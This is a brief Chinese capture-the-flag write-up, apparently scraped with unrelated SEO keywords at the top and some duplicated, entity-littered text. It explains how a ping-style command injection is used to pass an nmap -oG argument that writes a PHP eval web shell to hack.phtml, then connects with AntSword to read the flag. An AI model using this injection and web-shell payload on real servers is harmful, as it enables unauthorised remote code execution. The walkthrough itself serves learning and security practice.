简洁的企业网站源码,西安网站挂标,网站更改目录做301,上海企业免费网站建设打开题目 输入127.0.0.1 可以得到回显结果#xff0c;猜测是命令执行#xff0c;尝试使用|分隔地址与命令
127.0.0.1 | ls 可以看到|被\转义#xff0c;尝试使用;#xff1a; 直接放入Payload: ?php eval($_POST[hack]);? -oG hack.php 尝试修改文…打开题目 输入127.0.0.1 可以得到回显结果猜测是命令执行尝试使用|分隔地址与命令
127.0.0.1 | ls 可以看到|被\转义尝试使用; 直接放入Payload: ?php eval($_POST[hack]);? -oG hack.php 尝试修改文件名后缀为phtml ?php eval($_POST[hack]);? -oG hack.phtml 加上扫描的地址127.0.0.1
127.0.0.1 | ? eval($_POST[hack]);? -oG hack.phtml
得到 查看扫描列表 查看写入的文件即访问hack.phtml 蚁剑连接 在根目录找到了flag
